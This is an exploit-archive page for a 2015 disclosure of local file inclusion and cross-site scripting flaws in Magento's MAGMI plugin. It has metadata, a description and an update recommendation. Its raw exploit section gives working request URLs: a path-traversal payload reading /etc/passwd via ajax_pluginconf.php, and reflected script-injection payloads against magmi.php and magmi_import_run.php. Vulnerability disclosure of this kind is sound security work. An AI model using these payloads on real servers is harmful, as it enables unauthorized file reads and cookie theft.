header-logo
Suggest Exploit
vendor:
MAGMI Plugin
by:
SECUPENT
8.8
CVSS
HIGH
Local File Inclusion and Cross Site Scripting
94
CWE
Product Name: MAGMI Plugin
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2015

Magento Server MAGMI Plugin Local File Inclusion And Cross Site Scripting

The vulnerability exists due to insufficient sanitization of user-supplied input in 'file' and 'profile' parameters of 'ajax_pluginconf.php' and 'magmi.php' and 'magmi_import_run.php' scripts. A remote attacker can execute arbitrary HTML and script code in a browser in the context of the vulnerable website. Successful exploitation of this vulnerability may allow an attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Update to the latest version of Magento Server MAGMI Plugin.
Source

Exploit-DB raw data:

Exploit Title:  Magento Server MAGMI Plugin Local File Inclusion And Cross Site Scripting 
Software Link: http://sourceforge.net/projects/magmi/
Author: SECUPENT 
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 5-2-2015



Exploit(Local file inclusion) :

 http://{Server}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
 
 
 Screenshot: http://secupent.com/exploit/images/magmilfi.jpg
 
 
Exploit(Cross Site Scripting): 

 1. http://{Server}/magmi/web/magmi.php?configstep=2&profile=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E 
 
 2. http://{Server}/magmi/web/magmi_import_run.php?%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E
 

 Screenshot 1:http://secupent.com/exploit/images/magmixss1.jpg
 Screenshot 2: http://secupent.com/exploit/images/magmixss2.jpg 
 
 
 Thanks for read :) 
 Special Thanks: vulnerability.io, pentester.io, osvdb.org, exploit-db.com, 1337day.com, cxsecurity.com, packetstormsecurity.com and all other exploit archives, hackers and security researchers.